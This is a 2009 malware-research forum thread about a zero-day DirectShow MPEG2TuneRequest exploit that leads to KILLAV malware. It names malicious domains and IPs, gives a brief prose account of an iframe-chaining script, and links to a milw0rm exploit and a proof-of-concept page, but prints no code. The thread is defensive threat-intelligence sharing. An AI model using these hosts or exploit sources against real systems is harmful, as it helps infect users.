Malware Domain List

Malware Related => Tools of the trade / Internet News => Topic started by: SysAdMini on July 07, 2009, 07:20:29 am

Title: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: SysAdMini on July 07, 2009, 07:20:29 am
http://blog.trendmicro.com/zero-day-microsoft-directshow-mpeg2tunerequest-exploit-leads-to-killav-malware/
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: MysteryFCM on July 09, 2009, 08:29:33 pm
Code: [Select]
I thought I'd give you guys a quick analysis of what myb88.com/t.js (IP: 203.158.16.18), as mentioned by DNS-BH, actually does. The first thing we need to look at, is the contents of t.js;

From here, we can see that it is loading an iFrame to bybyybyb.com (59.34.197.154 - AS4134), based on whether tmpdomain is equal to zero (which is based on whether or not the URL matches any of the items in the arydomain array). This iFrame, then loads another iframe to index.htm which contains;

http://hphosts.blogspot.com/2009/07/myb88comtjs-quick-analysis.html
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: RS-232 on July 10, 2009, 05:28:52 am
Seems to be related to the exploit mentioned above,
kinda proof of concept skiddie tool or so,but i didn't really bothered checking it...
http://www.popsky.org/article/MPEG-2_0DAY_20090708012249.html
http://www.virustotal.com/analisis/cba86df44f23b3d980c60c2bc8f287a8d734dbbf4687214b363d6bc02f2e1bc4-1247203655
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: MysteryFCM on July 10, 2009, 06:04:29 am
NOD flagged it (the rar, as it was downloading) as the Statik trojan
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: RS-232 on July 10, 2009, 04:14:48 pm
The executable there appears to be multi-packed,at least from a very quick first look...
probably also the reason that some AVs reported "unknown packer" etc.

...Here's another interesting thread that I stumbled upon:
http://bbs.pediy.com/showthread.php?t=92912
Related to the domains mentioned in pediy's thread above:
http://blog.scansafe.com/journal/2009/7/7/china-attacks-worsen.html
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: RS-232 on July 11, 2009, 12:30:00 pm
http://milw0rm.com/exploits/9108